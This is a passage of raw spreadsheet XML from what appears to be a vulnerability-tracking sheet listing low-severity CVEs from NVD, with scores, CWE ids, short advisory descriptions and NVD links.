r="D1532" s="5" t="n"><v>3.3</v></c><c r="E1532" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1532" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1532" s="5" t="inlineStr" /><c r="H1532" s="5" t="n"><v>0.001</v></c><c r="I1532" s="5" t="inlineStr" /><c r="J1532" s="5" t="inlineStr" /><c r="K1532" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1532" s="5" t="inlineStr" /><c r="M1532" s="5" t="inlineStr" /><c r="N1532" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1532" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1532" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1532" s="5" t="inlineStr" /><c r="R1532" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1532" s="5" t="inlineStr"><is><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is></c><c r="T1532" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28623</t></is></c></row><row r="1533"><c r="A1533" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1533" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1533" s="5" t="inlineStr"><is><t>CVE-2026-28630</t></is></c><c r="D1533" s="5" t="n"><v>3.3</v></c><c r="E1533" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1533" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1533" s="5" t="inlineStr" /><c r="H1533" s="5" t="n"><v>0.001</v></c><c r="I1533" s="5" t="inlineStr" /><c r="J1533" s="5" t="inlineStr" /><c r="K1533" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1533" s="5" t="inlineStr" /><c r="M1533" s="5" t="inlineStr" /><c r="N1533" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1533" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1533" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1533" s="5" t="inlineStr" /><c r="R1533" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S1533" s="5" t="inlineStr"><is><t>In onCreate of ContactsPickerActivity.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1533" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28630</t></is></c></row><row r="1534"><c r="A1534" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1534" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1534" s="5" t="inlineStr"><is><t>CVE-2026-28638</t></is></c><c r="D1534" s="5" t="n"><v>3.3</v></c><c r="E1534" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1534" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1534" s="5" t="inlineStr" /><c r="H1534" s="5" t="n"><v>0.001</v></c><c r="I1534" s="5" t="inlineStr" /><c r="J1534" s="5" t="inlineStr" /><c r="K1534" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1534" s="5" t="inlineStr" /><c r="M1534" s="5" t="inlineStr" /><c r="N1534" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1534" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1534" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1534" s="5" t="inlineStr" /><c r="R1534" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1534" s="5" t="inlineStr"><is><t>In multiple functions of XmpDataParser.java, there is a possible improper data sanitization due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1534" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28638</t></is></c></row><row r="1535"><c r="A1535" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1535" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1535" s="5" t="inlineStr"><is><t>CVE-2026-28660</t></is></c><c r="D1535" s="5" t="n"><v>3.3</v></c><c r="E1535" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1535" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1535" s="5" t="inlineStr" /><c r="H1535" s="5" t="n"><v>0.001</v></c><c r="I1535" s="5" t="inlineStr" /><c r="J1535" s="5" t="inlineStr" /><c r="K1535" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1535" s="5" t="inlineStr" /><c r="M1535" s="5" t="inlineStr" /><c r="N1535" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1535" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1535" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1535" s="5" t="inlineStr" /><c r="R1535" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1535" s="5" t="inlineStr"><is><t>In getAllSessions of multiple files, there is a possible confused deputy due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1535" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28660</t></is></c></row><row r="1536"><c r="A1536" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1536" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1536" s="5" t="inlineStr"><is><t>CVE-2026-28671</t></is></c><c r="D1536" s="5" t="n"><v>3.3</v></c><c r="E1536" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1536" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1536" s="5" t="inlineStr" /><c r="H1536" s="5" t="n"><v>0.001</v></c><c r="I1536" s="5" t="inlineStr" /><c r="J1536" s="5" t="inlineStr" /><c r="K1536" s="5" t="inlineStr" /><c r="L1536" s="5" t="inlineStr" /><c r="M1536" s="5" t="inlineStr" /><c r="N1536" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1536" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1536" s="5" t="inlineStr" /><c r="R1536" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S1536" s="5" t="inlineStr"><is><t>In updateInternal of MediaProvider.java, there is a possible expose contents of files due to a race condition. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1536" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28671</t></is></c></row><row r="1537"><c r="A1537" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1537" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1537" s="5" t="inlineStr"><is><t>CVE-2026-45519</t></is></c><c r="D1537" s="5" t="n"><v>3.3</v></c><c r="E1537" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1537" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1537" s="5" t="inlineStr" /><c r="H1537" s="5" t="n"><v>0.001</v></c><c r="I1537" s="5" t="inlineStr" /><c r="J1537" s="5" t="inlineStr" /><c r="K1537" s="5" t="inlineStr" /><c r="L1537" s="5" t="inlineStr" /><c r="M1537" s="5" t="inlineStr" /><c r="N1537" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1537" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1537" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1537" s="5" t="inlineStr" /><c r="R1537" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S1537" s="5" t="inlineStr"><is><t>In screenArgsForPermissionCheckIfAny of multiple locations there is a possible risk of unauthorized access due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1537" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45519</t></is></c></row><row r="1538"><c r="A1538" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1538" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1538" s="5" t="inlineStr"><is><t>CVE-2026-45521</t></is></c><c r="D1538" s="5" t="n"><v>3.3</v></c><c r="E1538" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1538" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1538" s="5" t="inlineStr" /><c r="H1538" s="5" t="n"><v>0.001</v></c><c r="I1538" s="5" t="inlineStr" /><c r="J1538" s="5" t="inlineStr" /><c r="K1538" s="5" t="inlineStr" /><c r="L1538" s="5" t="inlineStr" /><c r="M1538" s="5" t="inlineStr" /><c r="N1538" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1538" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1538" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1538" s="5" t="inlineStr" /><c r="R1538" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1538" s="5" t="inlineStr"><is><t>In openFile of AppFuseBridge.java, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1538" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45521</t></is></c></row><row r="1539"><c r="A1539" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1539" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1539" s="5" t="inlineStr"><is><t>CVE-2026-45525</t></is></c><c r="D1539" s="5" t="n"><v>3.3</v></c><c r="E1539" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1539" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1539" s="5" t="inlineStr" /><c r="H1539" s="5" t="n"><v>0.001</v></c><c r="I1539" s="5" t="inlineStr" /><c r="J1539" s="5" t="inlineStr" /><c r="K1539" s="5" t="inlineStr" /><c r="L1539" s="5" t="inlineStr" /><c r="M1539" s="5" t="inlineStr" /><c r="N1539" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1539" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1539" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1539" s="5" t="inlineStr" /><c r="R1539" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1539" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible improper data sanitization due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1539" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45525</t></is></c></row><row r="1540"><c r="A1540" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1540" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1540" s="5" t="inlineStr"><is><t>CVE-2026-55290</t></is></c><c r="D1540" s="5" t="n"><v>3.3</v></c><c r="E1540" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1540" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1540" s="5" t="inlineStr" /><c r="H1540" s="5" t="n"><v>0.001</v></c><c r="I1540" s="5" t="inlineStr" /><c r="J1540" s="5" t="inlineStr" /><c r="K1540" s="5" t="inlineStr" /><c r="L1540" s="5" t="inlineStr" /><c r="M1540" s="5" t="inlineStr" /><c r="N1540" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1540" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1540" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1540" s="5" t="inlineStr" /><c r="R1540" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S1540" s="5" t="inlineStr"><is><t>In setTo of ResourceTypes.cpp, there is a possible out-of-bounds heap read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1540" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55290</t></is></c></row><row r="1541"><c r="A1541" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1541" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1541" s="5" t="inlineStr"><is><t>CVE-2026-86564</t></is></c><c r="D1541" s="5" t="n"><v>3.3</v></c><c r="E1541" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1541" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1541" s="5" t="inlineStr" /><c r="H1541" s="5" t="n"><v>0.001</v></c><c r="I1541" s="5" t="inlineStr" /><c r="J1541" s="5" t="inlineStr" /><c r="K1541" s="5" t="inlineStr" /><c r="L1541" s="5" t="inlineStr" /><c r="M1541" s="5" t="inlineStr" /><c r="N1541" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1541" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1541" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1541" s="5" t="inlineStr" /><c r="R1541" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1541" s="5" t="inlineStr"><is><t>A flaw was found in DPDK lib/vhost. Missing length validation before reading command_data in the virtio-net control-queue handler can cause an out-of-bounds read and a host process crash.</t></is></c><c r="T1541" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86564</t></is></c></row><row r="1542"><c r="A1542" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1542" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1542" s="5" t="inlineStr"><is><t>CVE-2026-28652</t></is></c><c r="D1542" s="5" t="n"><v>3.1</v></c><c r="E1542" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1542" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1542" s="5" t="inlineStr" /><c r="H1542" s="5" t="n"><v>0.002</v></c><c r="I1542" s="5" t="inlineStr" /><c r="J1542" s="5" t="inlineStr" /><c r="K1542" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1542" s="5" t="inlineStr" /><c r="M1542" s="5" t="inlineStr" /><c r="N1542" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1542" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1542" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1542" s="5" t="inlineStr" /><c r="R1542" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1542" s="5" t="inlineStr"><is><t>In multiple functions of RangingServiceImpl.java, there is a possible MITM due to a missing permission check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1542" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28652</t></is></c></row><row r="1543"><c r="A1543" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1543" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1543" s="5" t="inlineStr"><is><t>CVE-2026-48707</t></is></c><c r="D1543" s="5" t="n"><v>3.1</v></c><c r="E1543" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1543" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1543" s="5" t="inlineStr" /><c r="H1543" s="5" t="n"><v>0.002</v></c><c r="I1543" s="5" t="inlineStr" /><c r="J1543" s="5" t="inlineStr" /><c r="K1543" s="5" t="inlineStr" /><c r="L1543" s="5" t="inlineStr" /><c r="M1543" s="5" t="inlineStr" /><c r="N1543" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1543" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1543" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1543" s="5" t="inlineStr" /><c r="R1543" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1543" s="5" t="inlineStr"><is><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is></c><c r="T1543" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48707</t></is></c></row><row r="1544"><c r="A1544" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1544" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1544" s="5" t="inlineStr"><is><t>CVE-2026-84389</t></is></c><c r="D1544" s="5" t="n"><v>3.1</v></c><c r="E1544" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1544" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1544" s="5" t="inlineStr" /><c r="H1544" s="5" t="n"><v>0.001</v></c><c r="I1544" s="5" t="inlineStr" /><c r="J1544" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1544" s="5" t="inlineStr" /><c r="L1544" s="5" t="inlineStr" /><c r="M1544" s="5" t="inlineStr" /><c r="N1544" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1544" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1544" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1544" s="5" t="inlineStr" /><c r="R1544" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S1544" s="5" t="inlineStr"><is><t>A url redirection to untrusted site ('open redirect') vulnerability in Fortinet FortiSIEM 7.5.0 through 7.5.1, FortiSIEM 7.4.1 through 7.4.2 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t></is></c><c r="T1544" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84389</t></is></c></row><row r="1545"><c r="A1545" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1545" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1545" s="5" t="inlineStr"><is><t>CVE-2026-86670</t></is></c><c r="D1545" s="5" t="n"><v>2.9</v></c><c r="E1545" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1545" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1545" s="5" t="inlineStr" /><c r="H1545" s="5" t="n"><v>0.003</v></c><c r="I1545" s="5" t="inlineStr" /><c r="J1545" s="5" t="inlineStr" /><c r="K1545" s="5" t="inlineStr" /><c r="L1545" s="5" t="inlineStr" /><c r="M1545" s="5" t="inlineStr" /><c r="N1545" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1545" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1545" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1545" s="5" t="inlineStr" /><c r="R1545" s="5" t="inlineStr"><is><t>CWE-326, CWE-916</t></is></c><c r="S1545" s="5" t="inlineStr"><is><t>A flaw has been found in aircheng-org iWebShop-5 up to 5.15. This impacts an unknown function of the file controllers/admin.php of the component Authentication Storage. Executing a manipulation of the argument Password can lead to password hash with insufficient computational effort. It is possible to launch the attack remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1545" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86670</t></is></c></row><row r="1546"><c r="A1546" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1546" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1546" s="5" t="inlineStr"><is><t>CVE-2026-84392</t></is></c><c r="D1546" s="5" t="n"><v>2.7</v></c><c r="E1546" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1546" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1546" s="5" t="inlineStr" /><c r="H1546" s="5" t="n"><v>0.003</v></c><c r="I1546" s="5" t="inlineStr" /><c r="J1546" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1546" s="5" t="inlineStr" /><c r="L1546" s="5" t="inlineStr" /><c r="M1546" s="5" t="inlineStr" /><c r="N1546" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1546" s="5" t="inlineStr" /><c r="R1546" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1546" s="5" t="inlineStr"><is><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is></c><c r="T1546" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84392</t></is></c></row><row r="1547"><c r="A1547" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1547" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1547" s="5" t="inlineStr"><is><t>CVE-2026-82060</t></is></c><c r="D1547" s="5" t="n"><v>2.3</v></c><c r="E1547" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1547" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1547" s="5" t="inlineStr" /><c r="H1547" s="5" t="n"><v>0.002</v></c><c r="I1547" s="5" t="inlineStr" /><c r="J1547" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1547" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1547" s="5" t="inlineStr" /><c r="M1547" s="5" t="inlineStr" /><c r="N1547" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1547" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1547" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1547" s="5" t="inlineStr" /><c r="R1547" s="5" t="inlineStr"><is><t>CWE-943</t></is></c><c r="S1547" s="5" t="inlineStr"><is><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is></c><c r="T1547" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82060</t></is></c></row><row r="1548"><c r="A1548" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1548" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1548" s="5" t="inlineStr"><is><t>CVE-2026-82710</t></is></c><c r="D1548" s="5" t="n"><v>2.3</v></c><c r="E1548" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1548" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1548" s="5" t="inlineStr" /><c r="H1548" s="5" t="n"><v>0.004</v></c><c r="I1548" s="5" t="inlineStr" /><c r="J1548" s="5" t="inlineStr" /><c r="K1548" s="5" t="inlineStr" /><c r="L1548" s="5" t="inlineStr" /><c r="M1548" s="5" t="inlineStr" /><c r="N1548" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1548" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1548" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1548" s="5" t="inlineStr" /><c r="R1548" s="5" t="inlineStr"><is><t>CWE-150</t></is></c><c r="S1548" s="5" t="inlineStr"><is><t>Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in ash-project usage_rules allows a malicious package publisher to inject terminal control sequences into the output of mix usage_rules.search_docs.

mix usage_rules.search_docs searches Hex documentation through search.hexdocs.pm, which indexes the documentation of every published package, and prints the matching results (title, package, type, doc reference, and highlighted snippets) to the terminal. The formatter in Mix.Tasks.UsageRules.SearchDocs interpolated those publisher-controlled fields verbatim, neutralizing no terminal control characters; the only transform it applied adds escape sequences rather than removing them. A malicious package can embed ANSI terminal escape sequences (cursor movement, line erase, carriage returns, OSC 52 clipboard writes) in its indexed documentation, so when a developer runs a search that surfaces those docs the sequences reach the terminal unchanged — forging the displayed hexdocs URL or a suggested command, hiding text, or writing to the clipboard. No authentication or privileged position is required; only publishing a package.

This issue affects usage_rules: from 0.1.18 before 1.2.8.</t></is></c><c r="T1548" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82710</t></is></c></row><row r="1549"><c r="A1549" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1549" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1549" s="5" t="inlineStr"><is><t>CVE-2026-58234</t></is></c><c r="D1549" s="5" t="n"><v>2.2</v></c><c r="E1549" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1549" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1549" s="5" t="inlineStr" /><c r="H1549" s="5" t="n"><v>0.002</v></c><c r="I1549" s="5" t="inlineStr" /><c r="J1549" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1549" s="5" t="inlineStr" /><c r="L1549" s="5" t="inlineStr" /><c r="M1549" s="5" t="inlineStr" /><c r="N1549" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1549" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1549" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1549" s="5" t="inlineStr" /><c r="R1549" s="5" t="inlineStr"><is><t>CWE-776</t></is></c><c r="S1549" s="5" t="inlineStr"><is><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is></c><c r="T1549" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58234</t></is></c></row><row r="1550"><c r="A1550" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1550" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1550" s="5" t="inlineStr"><is><t>CVE-2026-86512</t></is></c><c r="D1550" s="5" t="n"><v>2.1</v></c><c r="E1550" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1550" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1550" s="5" t="inlineStr" /><c r="H1550" s="5" t="n"><v>0.002</v></c><c r="I1550" s="5" t="inlineStr" /><c r="J1550" s="5" t="inlineStr" /><c r="K1550" s="5" t="inlineStr" /><c r="L1550" s="5" t="inlineStr" /><c r="M1550" s="5" t="inlineStr" /><c r="N1550" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1550" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1550" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1550" s="5" t="inlineStr" /><c r="R1550" s="5" t="inlineStr"><is><t>CWE-266, CWE-284</t></is></c><c r="S1550" s="5" t="inlineStr"><is><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is></c><c r="T1550" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86512</t></is></c></row><row r="1551"><c r="A1551" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1551" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1551" s="5" t="inlineStr"><is><t>CVE-2026-86514</t></is></c><c r="D1551" s="5" t="n"><v>2.1</v></c><c r="E1551" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1551" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1551" s="5" t="inlineStr" /><c r="H1551" s="5" t="n"><v>0.003</v></c><c r="I1551" s="5" t="inlineStr" /><c r="J1551" s="5" t="inlineStr" /><c r="K1551" s="5" t="inlineStr" /><c r="L1551" s="5" t="inlineStr" /><c r="M1551" s="5" t="inlineStr" /><c r="N1551" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1551" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1551" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1551" s="5" t="inlineStr" /><c r="R1551" s="5" t="inlineStr"><is><t>CWE-119, CWE-121</t></is></c><c r="S1551" s="5" t="inlineStr"><is><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is></c><c r="T1551" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86514</t></is></c></row><row r="1552"><c r="A1552" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1552" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1552" s="5" t="inlineStr"><is><t>CVE-2026-86515</t></is></c><c r="D1552" s="5" t="n"><v>2.1</v></c><c r="E1552" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1552" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1552" s="5" t="inlineStr" /><c r="H1552" s="5" t="n"><v>0.003</v></c><c r="I1552" s="5" t="inlineStr" /><c r="J1552" s="5" t="inlineStr" /><c r="K1552" s="5" t="inlineStr" /><c r="L1552" s="5" t="inlineStr" /><c r="M1552" s="5" t="inlineStr" /><c r="N1552" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1552" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1552" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1552" s="5" t="inlineStr" /><c r="R1552" s="5" t="inlineStr"><is><t>CWE-400, CWE-404</t></is></c><c r="S1552" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in vgmstream up to r2117. Impacted is the function add_entry of the file src/meta/txtp_parser.c of the component txtp. Such manipulation of the argument range_start/range_end leads to resource consumption. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The name of the patch is 4b6a02dd1aff6428255db912563d77d4cb0a143e. It is advisable to implement a patch to correct this issue.</t></is></c><c r="T1552" s="6" 